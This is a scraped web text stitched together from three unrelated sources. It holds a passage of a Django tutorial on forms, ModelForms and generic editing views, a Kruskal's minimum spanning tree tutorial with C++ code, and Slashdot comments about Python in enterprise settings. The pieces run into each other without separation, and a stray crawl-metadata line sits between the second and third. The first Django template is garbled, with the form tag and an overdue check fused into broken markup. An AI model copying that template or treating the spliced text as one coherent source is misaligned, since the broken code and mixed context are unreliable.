        form = RenewBookForm(initial={'renewal_date': proposed_renewal_date,})

    return render(request, 'catalog/book_renew_librarian.html', {'form': form, 'bookinst': book_inst})
The template
Create the template referenced in the view (/catalog/templates/catalog/book_renew_librarian.html) and copy the code below into it:
{% extends "base_generic.html" %} {% block content %} <h1>Renew: {{bookinst.book.title}}</h1> <p>Borrower: {{bookinst.borrower}}</p> <p{% if bookinst.is_overdue %} {% csrf_token %} <table> {{ form }} </table> <input type="submit" value="Submit" /> </form> {% endblock %}
Most of this will be completely familiar from previous tutorials. We extend the base template and then redefine the content block. We are able to reference
{{bookinst}} (and its variables) because it was passed into the context object in the
render() function, and we use these to list the book title, borrower and the original due date.
The form code is relatively simple. First we declare the
form tags, specifying where the form is to be submitted (
action) and the
method for submitting the data (in this case an "HTTP POST") — if you recall the HTML Forms overview at the top of the page, an empty
action, as shown, means that the form data will be posted back to the current URL of the page (which is what we want!). Inside the tags we define the
submit input, which a user can press to submit the data. The
{% csrf_token %} added just inside the form tags is part of Django's cross-site forgery protection.
Note: Add the
{% csrf_token %} to every Django template you create that uses
POST to submit data. This will reduce the chance of forms being hijacked by malicious users.
All that's left is the
{{form}} template variable, which we passed to the template in the context dictionary. Perhaps unsurprisingly, when used as shown this provides the default rendering of all the form fields, including their labels, widgets, and help text — the rendering is as shown below:
<tr>
  <th><label for="id_renewal_date">Renewal date:</label></th>
  <td>
    <input id="id_renewal_date" name="renewal_date" type="text" value="2016-11-08" required />
    <br />
    <span class="helptext">Enter date between now and 4 weeks (default 3 weeks).</span>
  </td>
</tr>
Note: It is perhaps not obvious because we only have one field, but by default every field is defined in its own table row (which is why the variable is inside
table tags above). This same rendering is provided if you reference the template variable
{{ form.as_table }}.
If you were to enter an invalid date, you'd additionally get a list of the errors rendered in the page (shown in bold below).
<tr>
  <th><label for="id_renewal_date">Renewal date:</label></th>
  <td>
    <ul class="errorlist">
      <li>Invalid date - renewal in past</li>
    </ul>
    <input id="id_renewal_date" name="renewal_date" type="text" value="2015-11-08" required />
    <br />
    <span class="helptext">Enter date between now and 4 weeks (default 3 weeks).</span>
  </td>
</tr>
Other ways of using form template variable
Using
{{form}} as shown above, each field is rendered as a table row. You can also render each field as a list item (using
{{form.as_ul}} ) or as a paragraph (using
{{form.as_p}}).
What is even more cool is that you can have complete control over the rendering of each part of the form, by indexing its properties using dot notation. So for example we can access a number of separate items for our
renewal_date field:
{{form.renewal_date}}:The whole field.
{{form.renewal_date.errors}}: The list of errors.
{{form.renewal_date.id_for_label}}: The id of the label.
{{form.renewal_date.help_text}}: The field help text.
- etc!
For more examples of how to manually render forms in templates and dynamically loop over template fields, see Working with forms > Rendering fields manually (Django docs).
Testing the page
If you accepted the "challenge" in Django Tutorial Part 8: User authentication and permissions you'll have a list of all books on loan in the library, which is only visible to library staff. We can add a link to our renew page next to each item using the template code below.
{% if perms.catalog.can_mark_returned %}
  - <a href="{% url 'renew-book-librarian' bookinst.id %}">Renew</a>
{% endif %}
Note: Remember that your test login will need to have the permission "
catalog.can_mark_returned" in order to access the renew book page (perhaps use your superuser account).
You can alternatively manually construct a test URL like this —<bookinstance_id>/renew/ (a valid bookinstance id can be obtained by navigating to a book detail page in your library, and copying the
id field).
What does it look like?
If you are successful, the default form will look like this:
The form with an invalid value entered, will look like this:
The list of all books with renew links will look like this:
ModelForms
Creating a
Form class using the approach described above is very flexible, allowing you to create whatever sort of form page you like and associate it with any model or models.
However if you just need a form to map the fields of a single model then your model will already define most of the information that you need in your form: fields, labels, help text, etc. Rather than recreating the model definitions in your form, it is easier to use the ModelForm helper class to create the form from your model. This
ModelForm can then be used within your views in exactly the same way as an ordinary
Form.
A basic
ModelForm containing the same field as our original
RenewBookForm is shown below. All you need to do to create the form is add
class Meta with the associated
model (
BookInstance) and a list of the model
fields to include in the form (you can include all fields using
fields = '__all__', or you can use
exclude (instead of
fields) to specify the fields not to include from the model).
from django.forms import ModelForm
from .models import BookInstance

class RenewBookModelForm(ModelForm):
    class Meta:
        model = BookInstance
        fields = ['due_back',]
Note: This might not look much simpler than just using a
Form (and it isn't in this case, because we just have one field). However, if you have a lot of fields it can reduce the amount of code quite significantly!
The rest of the information comes from the model field definitions (e.g. labels, widgets, help text, error messages). If these aren't quite right, then we can override them in our
class Meta, specifying a dictionary containing the field to change and its new value. For example, in this form we might want a label for our field of "Renewal date" (rather than the default based on the field name: Due date), and we also want our help text to be specific to this use case. The
Meta below shows you how to override these fields, and you can similarly set
widgets and
error_messages if the defaults aren't sufficient.
class Meta:
    model = BookInstance
    fields = ['due_back',]
    labels = { 'due_back': _('Renewal date'), }
    help_texts = { 'due_back': _('Enter a date between now and 4 weeks (default 3).'), }
To add validation you can use the same approach as for a normal
Form — you define a function named
clean_field_name() and raise
ValidationError exceptions for invalid values. The only difference with respect to our original form is that the model field is named
due_back and not "
renewal_date".
import datetime

from django.forms import ModelForm
from django.core.exceptions import ValidationError
from django.utils.translation import ugettext_lazy as _

from .models import BookInstance

class RenewBookModelForm(ModelForm):
    def clean_due_back(self):
        data = self.cleaned_data['due_back']

        # Check the date is not in the past.
        if data < datetime.date.today():
            raise ValidationError(_('Invalid date - renewal in past'))

        # Check the date is in the range a librarian is allowed to set (+4 weeks).
        if data > datetime.date.today() + datetime.timedelta(weeks=4):
            raise ValidationError(_('Invalid date - renewal more than 4 weeks ahead'))

        # Remember to always return the cleaned data.
        return data

    class Meta:
        model = BookInstance
        fields = ['due_back',]
        labels = { 'due_back': _('Renewal date'), }
        help_texts = { 'due_back': _('Enter a date between now and 4 weeks (default 3).'), }
The class
RenewBookModelForm below is now functionally equivalent to our original
RenewBookForm. You could import and use it wherever you currently use
RenewBookForm.
Generic editing views
The form handling algorithm we used in our function view example above represents an extremely common pattern in form editing views. Django abstracts much of this "boilerplate" for you, by creating generic editing views for creating, editing, and deleting views based on models. Not only do these handle the "view" behaviour, but they automatically create the form class (a
ModelForm) for you from the model.
Note: In addition to the editing views described here, there is also a FormView class, which lies somewhere between our function view and the other generic views in terms of "flexibility" vs "coding effort". Using
FormView you still need to create your
Form, but you don't have to implement all of the standard form-handling pattern. Instead you just have to provide an implementation of the function that will be called once the submitted is known to be be valid.
In this section we're going to use generic editing views to create pages to add functionality to create, edit, and delete
Author records from our library — effectively providing a basic reimplementation of parts of the Admin site (this could be useful if you need to offer admin functionality in a more flexible way than can be provided by the admin site).
Views
Open the views file (locallibrary/catalog/views.py) and append the following code block to the bottom of it:
from django.views.generic.edit import CreateView, UpdateView, DeleteView
from django.urls import reverse_lazy

from .models import Author

class AuthorCreate(CreateView):
    model = Author
    fields = '__all__'
    initial = {'date_of_death': '05/01/2018',}

class AuthorUpdate(UpdateView):
    model = Author
    fields = ['first_name', 'last_name', 'date_of_birth', 'date_of_death']

class AuthorDelete(DeleteView):
    model = Author
    success_url = reverse_lazy('authors')
As you can see, to create the views you need to derive from
CreateView,
UpdateView, and
DeleteView (respectively) and then define the associated model.
For the "create" and "update" cases you also need to specify the fields to display in the form (using in same syntax as for
ModelForm). In this case we show both the syntax to display "all" fields, and how you can list them individually. You can also specify initial values for each of the fields using a dictionary of field_name/value pairs (here we arbitrarily set the date of death for demonstration purposes — you might want to remove that!). By default these views will redirect on success to a page displaying the newly created/edited model item, which in our case will be the author detail view we created in a previous tutorial. You can specify an alternative redirect location by explicitly declaring parameter
success_url (as done for the
AuthorDelete class).
The
AuthorDelete class doesn't need to display any of the fields, so these don't need to be specified. You do however need to specify the
success_url, because there is no obvious default value for Django to use. In this case we use the
reverse_lazy() function to redirect to our author list after an author has been deleted —
reverse_lazy() is a lazily executed version of
reverse(), used here because we're providing a URL to a class-based view attribute.
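The "lazy" part matters because class attributes are evaluated at import time, before the URL configuration has been loaded. The general idea of deferring a lookup until the value is actually used can be illustrated without Django (the names here are ours):

```python
class Lazy:
    """Defer calling fn() until the value is actually needed."""
    def __init__(self, fn):
        self.fn = fn
    def __str__(self):
        return str(self.fn())

registry = {}  # stands in for the URL configuration, populated later

# Safe at "import time": nothing is looked up until str() is called,
# just as reverse_lazy() defers the URL lookup in a class attribute.
url = Lazy(lambda: registry['authors'])

registry['authors'] = '/catalog/authors/'  # the "URLconf" becomes available
```

An eager lookup (registry['authors'] at definition time) would have raised a KeyError; the lazy wrapper succeeds because the lookup happens only when the value is rendered.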
Templates
The "create" and "update" views use the same template by default, which will be named after your model: model_name_form.html (you can change the suffix to something other than _form using the
template_name_suffix field in your view, e.g.
template_name_suffix = '_other_suffix')
Create the template file locallibrary/catalog/templates/catalog/author_form.html and copy in the text below.
{% extends "base_generic.html" %} {% block content %} <form action="" method="post"> {% csrf_token %} <table> {{ form.as_table }} </table> <input type="submit" value="Submit" /> </form> {% endblock %}
This is similar to our previous forms, and renders the fields using a table. Note also how again we declare the
{% csrf_token %} to ensure that our forms are resistant to CSRF attacks.
The "delete" view expects to find a template named with the format model_name_confirm_delete.html (again, you can change the suffix using
template_name_suffix in your view). Create the template file locallibrary/catalog/templates/catalog/author_confirm_delete.html and copy in the text below.
{% extends "base_generic.html" %} {% block content %} <h1>Delete Author</h1> <p>Are you sure you want to delete the author: {{ author }}?</p> <form action="" method="POST"> {% csrf_token %} <input type="submit" action="" value="Yes, delete." /> </form> {% endblock %}
URL configurations
Open your URL configuration file (locallibrary/catalog/urls.py) and add the following configuration to the bottom of the file:
urlpatterns += [
    url(r'^author/create/$', views.AuthorCreate.as_view(), name='author_create'),
    url(r'^author/(?P<pk>\d+)/update/$', views.AuthorUpdate.as_view(), name='author_update'),
    url(r'^author/(?P<pk>\d+)/delete/$', views.AuthorDelete.as_view(), name='author_delete'),
]
There is nothing particularly new here! You can see that the views are classes, and must hence be called via
.as_view(), and you should be able to recognise the URL patterns in each case. We must use
pk as the name for our captured primary key value, as this is the parameter name expected by the view classes.
The author create, update, and delete pages are now ready to test (we won't bother hooking them into the site sidebar in this case, although you can do so if you wish).
Note: Observant users will have noticed that we didn't do anything to prevent unauthorised users from accessing the pages! We leave that as an exercise for you (hint: you could use the
PermissionRequiredMixin and either create a new permission or reuse our
can_mark_returned permission).
Testing the page
First login to the site with an account that has whatever permissions you decided are needed to access the author editing pages.
Then navigate to the author create page, which should look like the screenshot below.
Enter values for the fields and then press Submit to save the author record. You should now be taken to a detail view for your new author.
You can test editing records by appending /update/ to the end of the detail view URL; we don't show a screenshot because it looks just like the "create" page!
Last of all, we can delete a record by appending /delete/ to the end of the author detail-view URL. Django should display the delete page shown below. Press Yes, delete. to remove the record and be taken to the list of all authors.
Challenge yourself
Create some forms to create, edit and delete
Book records. You can use exactly the same structure as for
Authors. If your book_form.html template is just a copy-renamed version of the author_form.html template, then the new "create book" page will look like the screenshot below:
Summary
Creating and handling forms can be a complicated process! Django makes it much easier by providing programmatic mechanisms to declare, render and validate forms. Furthermore, Django provides generic form editing views that can do almost all the work to define pages that can create, edit, and delete records associated with a single model instance.
There is a lot more that can be done with forms (check out our See also list below), but you should now understand how to add basic forms and form-handling code to your own websites.
See also
- Working with forms (Django docs)
- Writing your first Django app, part 4 > Writing a simple form (Django docs)
- The Forms API (Django docs)
- Form fields (Django docs)
- Form and field validation (Django docs)
- Form handling with class-based views (Django docs)
- Creating forms from models (Django docs)
- Generic editing views (Django docs)
In this article we mainly discuss the formation of a minimum spanning tree, as well as how Kruskal's algorithm obtains the minimum spanning tree of a graph. We also provide an implementation of Kruskal's algorithm in C++ to help you brush up on your concepts.
What is Kruskal’s Algorithm?
Graphs might just be one of the most difficult areas of programming to approach as a beginner, primarily because questions on graph data structures and algorithms rarely make it obvious how to proceed with a solution; only rigorous practice improves one's command of them. Two of the most popular families of graph algorithms are those for traversing a graph in the minimum time possible and those that produce a minimum spanning tree from it. For graph traversal we have the BFS and DFS algorithms, while a minimum spanning tree can be produced with the help of Prim's algorithm or Kruskal's algorithm.
These are some of the easiest algorithms one can learn when starting out with graphs. Minimum spanning trees reduce the number of edges to a large extent so that only the minimal edges remain. This, in turn, finds application in solving a variety of problems that can be modelled with graphs. (The real difficulty for any beginner is recognising that a graph can be used to solve a problem, and learning how to manipulate the vertices and edges to their advantage.)
What is a Minimum spanning tree?
The main objective of using Kruskal's algorithm is to obtain the minimum cost spanning tree of a graph. However, this makes no sense if you don't understand what a minimum spanning tree exactly is. This is best explained with an example.
Let us suppose we have a graph like this:
We have four nodes, A, B, C, and D. We can rearrange the various edges of the graph to remove cycles and form a tree. This can be done in several ways:-
In this case, the weight of the tree is 22+21+13=56.
In this case, the weight of the tree is 10+22+21=53.
In this case, the weight of the tree is 10+18+13=41. On carefully comparing, we might see that this tree has the minimum weight amongst all of the trees obtained. The main objective for Prim’s algorithm or Kruskal’s algorithm is to obtain this minimum spanning tree. A tree obtained from a graph such that the sum of the weights of the edges is minimum is called a minimum spanning tree.
How Kruskal algorithm Works
The algorithm starts with V different groups (where V is the number of vertices in a graph). At every step of the process, the edge with the minimum weight of the graph is chosen and added to the minimum spanning tree. An edge is only chosen in such a way if it does not create a cycle – if the edge with the minimum weight causes a cycle in the minimum spanning tree, the algorithm proceeds with the edge with the second minimum weight. Adding an edge to the graph also merges both of the vertices making it into one group (remember that each of the vertices starts in separate groups initially). When the algorithm is finished, only one group is left which represents the minimum spanning tree.
C++ Kruskal’s algorithm works in a slightly different manner than Prim’s algorithm. Prim’s algorithm pushes vertices to this group and expands it one by one starting from the two vertices which form the edge with the minimum weight. Kruskal’s algorithm is more concerned with the edges rather than the vertices and deals with edges directly by adding their vertices to a common group.
There are two main ways of implementing Kruskal’s algorithm in C++: disjoint sets or priority queues. Using disjoint sets is slightly better as it helps visualize the change in the groups at any point in time.
The algorithm is as follows:-
- Initialize an array for storing the groups of the vertices.
- Initialize an array for storing the edges of the graph with their weights.
- Initialize the spanning tree as an empty array.
- Put all vertices of the graph into different groups.
- Sort the array of edges in increasing order of weights.
- Continue step 7 till there is no more edge remaining in the sorted array of edges
- If the group of one node of an edge does not match the group of the other node of the edge, add them both to the same group and add the edge to the spanning tree array.
- Iterate through the spanning-tree array and add the weights of the edges.
- The sum of the edges thus obtained is the weight of the minimum spanning tree, while the spanning tree array contains the edges for the same.
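As a cross-check of the steps above, here is a compact sketch of the same procedure in Python (our own illustration; the article's implementation below is in C++). It runs Kruskal's algorithm on the four-node example graph used throughout, with vertices A, B, C, D numbered 0 to 3:

```python
def kruskal(num_vertices, edge_list):
    """edge_list: list of (weight, u, v). Returns (total_weight, chosen_edges)."""
    parent = list(range(num_vertices))  # every vertex starts in its own group

    def find(a):
        # Root of a's group, with path halving.
        while parent[a] != a:
            parent[a] = parent[parent[a]]
            a = parent[a]
        return a

    total, chosen = 0, []
    for w, u, v in sorted(edge_list):   # consider edges in increasing weight
        ru, rv = find(u), find(v)
        if ru != rv:                    # skip edges that would form a cycle
            parent[ru] = rv             # merge the two groups
            total += w
            chosen.append((u, v, w))
    return total, chosen

# Example graph: A=0, B=1, C=2, D=3
graph = [(10, 0, 1), (18, 1, 2), (13, 2, 3), (21, 0, 2), (22, 1, 3)]
```

Running it on this graph picks the edges AB (10), CD (13), and BC (18) and rejects AC and BD as cycle-forming, matching the worked example.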
Example
Let’s work out an example. Consider the above graph and let’s try to apply Kruskal’s algorithm to it.
Initially, we have to pick the first edge which has the minimum weight. AB is picked here, which weights 10.
Now, we pick the edge with the second minimum weight. CD is picked here since it weighs 13.
Proceeding further, we find that the edge with minimum weight is BC. The weight of this edge is 18.
Since a complete tree is obtained, we stop the algorithm here. The minimum weight for the tree thus obtained is 10+18+13=41.
C++ Program for Kruskal's Algorithm
The C++ implementation of Kruskal's algorithm with the help of the union-find algorithm is given below. This is the source code of the C++ Kruskal algorithm:-
#include <iostream>
#include <vector>
#include <algorithm>
using namespace std;

const int MAX = 1e6 - 1;
int root[MAX];
const int nodes = 4, edges = 5;
pair<long long, pair<int, int>> p[MAX];

// Find the root (representative) of the given node's group.
int parent(int a)
{
    while (root[a] != a) {
        root[a] = root[root[a]];  // path halving
        a = root[a];
    }
    return a;
}

// Merge the groups containing the two given vertices.
void union_find(int a, int b)
{
    int d = parent(a);
    int e = parent(b);
    root[d] = root[e];
}

long long kruskal()
{
    int a, b;
    long long cost, minCost = 0;
    for (int i = 0; i < edges; ++i) {
        a = p[i].second.first;
        b = p[i].second.second;
        cost = p[i].first;
        // Only select the edge if it does not create a cycle
        // (i.e. its two endpoints have different roots).
        if (parent(a) != parent(b)) {
            minCost += cost;
            union_find(a, b);
        }
    }
    return minCost;
}

int main()
{
    long long minCost;
    for (int i = 0; i < MAX; ++i)  // initially every vertex is its own group
        root[i] = i;

    p[0] = make_pair(10, make_pair(0, 1));
    p[1] = make_pair(18, make_pair(1, 2));
    p[2] = make_pair(13, make_pair(2, 3));
    p[3] = make_pair(21, make_pair(0, 2));
    p[4] = make_pair(22, make_pair(1, 3));

    sort(p, p + edges);  // sort the array of edges by weight
    minCost = kruskal();
    cout << "Minimum cost is: " << minCost << endl;
    return 0;
}
Output
The output for the given code segment is:
Minimum cost is: 41
Conclusion
Our explanation of Kruskal’s algorithm and how it can be used to find a minimum spanning tree for a graph should prove to a useful tool in your preparation. The attached code also shows an implementation of Kruskal’s algorithm in C++. | https://favtutor.com/blogs/kruskal-algorithm-cpp | CC-MAIN-2022-05 | refinedweb | 1,265 | 68.1 |
Python Moving into the Enterprise
Which Enterpise (Score:4, Funny)
Python on the NX-01 (Score:3, Funny)
Jython? (Score:4, Interesting)
Re:Jython? (Score:5, Insightful)
Re:Jython? (Score:5, Informative)
It's the output of Java programmers that turns my stomach.
Re:Jython? (Score:5, Insightful)
I think the level of knowledge among Java programmers is impressive, but by and large I've found they aren't necessarily better programmers because of it. I've learned this the hard way, by hiring people with incredibly impressive knowledge of Java APIs, and then watching them struggle with overengineered designs that attempt to drag as much of that knowledge in as they can manage. I'm not going to make sweeping generalizations here, only to state that I've had bad experiences with Java guys who prefer to wander lost in the wonderfully rich world of Java APIs and frameworks than focusing on a customer's problem.
Re:Too bad... (Score:5, Insightful)
I'm sorry, but the "but it's slow" argument does not hold for most software designed today. Let's please get over it.
Re:Too bad... (Score:3, Informative)
What planet are you from? I do a lot of work at oil companies and utilities, and they have tons of slow software that causes them to hemorrhage man-hours at an insane rate. I'm talking about the big name companies spending tens of millions of dollars per year on bloated applications that take 30-60 seconds just to start up and take just as long to perform many of their routine functions. People often use these vario
Re:Too bad... (Score:3, Insightful)
When I code for fun I seldom do that in C/C++ anymore. At least not if I know that the application won't need "that extra juice". What's the point in spending several times the development effort on making it work properly instead of
Re:Too bad... (Score:5, Insightful)
What's the point of making it work properly?!?!? Surely you have mis-spoken here.
Let's play a game. Let's suppose a bunch of little apps for which speed is not a critical factor for any one of them. As a forinstance, look at all those apps presently running in the system tray. Let's suppose that those apps are written badly or are written in inefficient languages. That shouldn't be too much of a stretch.
Now, let's try to do something. Whether you are trying to run a realtime application like desktop video conferencing or create a document in a word processor, it doesn't really matter. What ever it is that you try will be a struggle because the system's resources (CPU cycles, memory, swap space) are consumed by all those "noncritical" apps and their inefficiencies. A 1Ghz processor with 1 gig of RAM is no longer adequate? That's ridiculous! And yet, that is where we are at today.
Everyone seems to feel that their "Ultimate MP3 player" is the only app in the world or at least the only one that will ever be run on a machine. They don't think that speed and size are important. After all, they have a very powerful machine at their disposal with oodles of available resources, right? They fail to realize that their program, no matter how wonderful, is only one of countless others that are all running at the same time and are required to share the resources. They fail to realize that their app may not be too slow when run by itself, but it becomes too slow when run with everything else.
Today, the preferred system is 3Ghz, 64bit, with at least 2 gigs of RAM. Why? What's the point of such a powerful system? Speed! That's the point. Speed is important. Code efficiency is important. But, as programmers continue to deny this and produce poorly written and bloated/slow apps or use inefficient languages, the time will come when a 6Ghz processor is not enough. Doesn't that sound stupid?
Re:Too bad... (Score:4, Insightful)
If there was money to be made by making that WeatherThing or UltimateMP3 player fast and efficient - companies would do that. There's plenty of programmers out there capable of writing in or learning more low level languages - of optimizing each loop or branch. The problem is that people are not willing to pay all of the extra associated with the development and testing of software written with risky optimizations (optimizations tend to complicate and obfuscate code, reduce abstraction, etc) in unsafe languages.
The truth is the consumer would rather spend an extra $100 to get enough RAM than spend $10 per program on their PC (that adds up faster) for the programmers to program it "correctly." It's not economically efficient, at least not in the eyes of the consumers.
Why do you think so many kitchen appliances last only a year or two nowadays? Or current VCRs which almost qualify as "disposable." People are rarely willing to pay extra when they think the low cost option is "good enough." In some ways this is what killed the Mac - it was better according to many metrics, but PCs were "good enough" for the average consumer, and the price difference wasn't justifiable.
A computer is a tool to get work done, nothing more. If people valued security, reliability, and efficiency enough, most software would be secure, reliable and efficeint. But people value features and low price, so that's what the market gives them.
Look on the bright side - at least compilers are getting better.
Re:Too bad... (Score:3, Insightful)
The logical extreme of the "all apps must be as fast as possible" argument is to code in ASM. I suggest that anybody who pushes this argument write every app in ASM. See how long it takes before this person gets fired for inefficiency...
Why are some coders hesitant to "use the right tool for the job"? ASM might be necessary if you're optimizing a crypto or compression loop, while C or C++ might be more appropriate for the
Re:Too bad... (Score:5, Insightful)
Another poster already made a clarification on this. I didn't "mis-speak", I was just a bit obscure with my meaning. Point being, if you code in C/C++ you'll spend a lot of time making the program work correctly. If you write in e.g. Java or Python you can get the program working correctly in a fraction of the time. This means you can add polish or move on to new stuff.
Point being, you are more productive in other languages as you don't have to mess with the details so much.
First off, I'm willing to bet that virtually none of the little apps you currently have running are written in Java/Python whatnot. A sloppy coder can leak memory in any language. (In fact I'd say it's a lot easier to leak memory in a language without a GC.) So moving to C/C++ doesn't really fix the memory issue.
That they consume enormous amounts of CPU is also not really true. Those processes I have running on my machine all go in at 0% CPU time. If you add them together they might reach a few percent. Not really something which will stop you from typing in Word.
The fix for this "problem" is to get an OS with a decent scheduler so you can prioritise processes properly. That way your real-time applications won't suffer because your little application wants to check for new mail.
No, bragging to your friends that you can get 180 FPS in Doom3 is important. Very few people actually need a 3GHz 64-bit CPU with 2GB memory, I have one and I sure as hell don't need it.
And while code has become more bloated and unoptimised by the years a lot of that is because today a computer can do quite a hell of a lot more than say 10 years ago. Is all of that necessary stuff? Hell no! Is it more fun? Hell yes!
Finally there is one specific area of consumer software that actually demands better computers. That is games. Interestingly enough that area also have many of the best coders.
Re:Too bad... (Score:3, Interesting)
One of the very important featur
Re:Too bad... (Score:3, Insightful)
You are right though that a mix of high level and low level languages tends to give the best result in the lowest amount of time. What has shocked me is that from
Re:Too bad... (Score:3, Insightful)
You meet the demands of the project/customer. I'm not really arguing with you, but this is sort of the point of a thread about Python. It's a tool that helps balance this process for the developer - this in turn should result in benefits to the enduser.
It is nice to have a perfect balance, but efficiency is relative and (developer) resources are finite. Always.
Re:Too bad... (Score:3, Informative)
Apologies in advance if I have misunderstood you, but
...
I think you may be missing an important point here. In older languages, you'll find that the bulk of the work was often thrust on the programmer because the programmer was far cheaper than the computer. One need look no further than the horror of JCL and COBOL to see a high level language that still required inordinate amounts of fiddling by the programmer to get it to play nicely with the computer.
Today, we find that the programmer is far more
Re:Too bad... (Score:3, Insightful)
I program in C every day and I haven't coded an error of the type you describe in over a year. I would know if I had -- our C memory manager catches all manner of pointer problems, accounts for all memory allocation and freeing, memory over- and under-runs, gives us stats on mem
Finding a good general purpose language is hard! (Score:3, Interesting)
The problem is that actually, it hasn't, although it surely should have been a long, long time ago. Alas, the bulk of the software development industry is so driven by marketing hype and buzzwords that it has collectively failed to develop a new language that is a serious choice as a general purpose programming language spann
Re:Finding a good general purpose language is hard (Score:3, Insightful)
I'm also extremely unconvinced that any of the languages you mention have less "reasoned design decisions" than C++. The advant
Re:Finding a good general purpose language is hard (Score:3, Insightful)
It all depends on your application domain. For applications that are predominantly UI/database driven, as obviously many are, C++ has few advantages over something like Java. However, in anything scientific (where performance is often paramount) or in huge markets like embedded or instrument-control applications (where tight code and/or low-level contr
Re:Too bad... (Score:4, Insightful)
Okay, I'm going to refute this is two stages because you're wrong in two ways.
First, it's not a matter of "processors are cheap". It's "processors are cheap compared to programmers, sometimes". If they're paying for months of your time, most of the time it's way cheaper for them to get a faster computer than to have you write the thing in a language that will take longer. That is of course dependent on the number of computers it will run on and the performance requirements of the project.
Second, Java and Python are not necessarily slow. In the case of Java, it's usually a matter of keeping heap allocations to a minimum. In the case of Python, it's usually a matter of spending as much time as possible in a C library (even if that means you have to write the C library).
Doing that will usually get you within a factor of two of the performance of C.
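That "spend time in C" advice applies even to the built-ins; a minimal sketch (the function name is illustrative):

```python
# Two ways to sum a list. The logic is identical, but the built-in
# sum() runs its loop inside the interpreter's C core, while
# slow_sum() executes one Python bytecode step per iteration.
def slow_sum(numbers):
    total = 0
    for n in numbers:
        total += n
    return total

data = list(range(1000000))

# Same answer either way; sum() is typically several times faster
# because the iteration happens in C rather than in Python bytecode.
fast = sum(data)
slow = slow_sum(data)
```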
Advantages? (Score:4, Interesting)
Besides... wasn't Star Trek cancelled?
Re:Advantages? (Score:2, Interesting)
Re:Advantages? (Score:3, Insightful)
The problem arises in Python's web programming support. The documentation is pretty much non-existent and you can soon get module-overload when you are importing more and more modules to do fairly simple stuff in web apps.
Sometimes I just think that while Python is most certainly a far better designed language, PHP/ASP.NET (C#) seems much more 'practical', and it's definitely much easier to quickly build web apps in.
Is the
Re:Advantages? (Score:4, Informative)
Foundations of Python Network Programming [amazon.com].
My only experience of web programming in Python is the client end, for web-scraping scripts, and it's great for that. The one problem I have is that once in every few hours urllib2 locks up whilst trying to get a page from a particular site.
Re:Advantages? (Score:3, Interesting)
Yes, it's a little bit of a learning curve, but (and I did all of them for a living) it beats Java/Tomcat/Struts and PHP hands down in productivity/maintainability once you get a grip on it.
Re:Advantages? (Score:5, Informative)
It's like: why build your own search engine, security engine, your own membership system, html form engine, templating system, cache engine, skin system, content types & custom types, etc, when you can just use zope & plone and get a complete framework with open source products and addons on which thousands already develop at the highest professional level?
I admit that Plone and zope suffer from some documentation problem, but it's possible to overcome that. There are free books, available online (Zope book and The Definitive Guide to Plone) that can get you through. The documentation on Plone.org is getting very good. There are several code repositories (collective is one of them and some on zope.org) that have example products. Also, read the sources, they're not that hard to understand.
And before any of you jump and shout Booo!! ZODB, let me remind you that you can just as well use a regular SQL server to store your content information.
Re:Advantages? (Score:2, Insightful)
If you take out comments, which one is easier to read?
I have nothing personal against Python, actually I can say that I am a fan of Python, but let's use the right tool for the right job.
Re:Advantages? (Score:5, Insightful)
The one thing that Java has going for it are "standard" APIs you can bank on. Is there a standard set of enterprise APIs for Python akin to J2EE?
And all of this isn't to say that one can't leverage both technologies [bea.com] where appropriate, even in commercial products...
How not to win the corporate mind. (Score:4, Insightful)
For good measure, let's look at the documentation from a J2EE vendor here [bea.com].
While PEAK sounds intriguing, I'm not sure that major projects started by Fortune 100 globals will leverage a technology that lacks the level of documentation quality you can find in other products in that space.
I bring this up because documentation is often an indicator of the level of quality you can expect in terms of support. This is not to say PEAK is bad or poorly written, just that the supporting documentation and resources don't match those available for J2EE implementations.
Remember -- it isn't the best technology that wins, but the technology that is most accessible. In the case of enterprise APIs, even though PEAK may be easier and more scalable (and this is an excerpt from their page): But PEAK is different from J2EE: it's a single, free implementation of simpler API's based on an easier-to-use language that can nonetheless scale with better performance than J2EE.
...it will need some time and some nurturing in order to compete for mindshare with developers and non-technical decision makers.
Re:Advantages? (Score:5, Insightful)
That said, the grandparent poster was a bit disingenuous. The File class is roughly equivalent to the stat function/structure in C. You can't read the file without creating an InputStream/Reader.
So yes. You are correct. It is more verbose when doing simple operations. But I like to think that more complex operations fall together more easily.
Many programmers like to whip something out now. A quick "one off". Instead, often, with a little more time and more ground work, they can make something that is reusable.
In terms of the IO being verbose: well, it's pretty flexible. Two interfaces (InputStream/OutputStream) are used for many different operations. Read/write a file. Read/write to/from a socket. Read/write from a string or byte array. Read/write serialized objects to/from a file/socket/etc. It's not just file IO. It's ALL IO. Long story short, that is why.
Re:Advantages? (Score:3, Insightful)
What a silly picture.
Re:Advantages? (Score:5, Informative)
Re:Advantages? (Score:4, Insightful)
I do suppose if your definition of a good enterprise language is one with all such libraries included, then Python isn't a very good enterprise language. Of course, one could argue that the benefits of Python outweigh the disadvantages at having to download extra packages to handle SOAP, ORB etc.
The difference between Java and Python is similar to the difference between C# and Visual Basic.
I'm a little confused. Are you saying that Python is inferior to Java because Java comes with library X included, whilst with Python library X has to be downloaded separately?
Python is slower than Java and higher level than Java, but beyond that I can't say that there's too much separating Java and Python as languages. Personally, I find programming in Python more efficient, despite having more years experience with Java, but that may be just me.
Re:Advantages? (Score:4, Interesting)
I program a lot. In the course of my job, I have to review a lot of other people's code. I have a particular bracing style I use; and sure enough, I've not only become accustomed to it but also "tuned" to it to the point where it becomes difficult to read someone else's code if (for instance) they use the "K&R" style:
Because at my company, code looks like this:
Those two styles lead to a considerable difference in code density, and so affect readability and my "tuned" response to what I see. And there are so many other C/Java coding styles re bracing and indentation, or lack thereof.
In Python, there is one indentation style. Just one. Not bunches of them. So I get used to the way Python looks, the "tuning" goes into my backbrain or wherever the heck that stuff lives, and I can read anyone's code. This is a distinct benefit for me, and I suspect for others as well.
I would have loved a C compiler that didn't use braces, but used indentation instead. Man, that would have been glorious. Sigh.
Re:Advantages? (Score:5, Informative)
Probably the biggest difference is that there are no checked exceptions in Python. Java has both checked exception and non-checked ("runtime") exceptions, but the normal type of exception used in practice is checked. A checked exception is compulsory for the caller to handle or to pass up.
In theory, a programmer using an API with checked exceptions has to consider all the things that could possibly go wrong. In reality, the idea you can catch every error before you get to testing is a pipe dream. You often don't know what you want to do with it until you have some empirical experience with your basic design. So you do one of two things -- either handle the exception in a half-assed but temporary manner (hoping you'll remember to come back and fix it later), or you pass the buck.
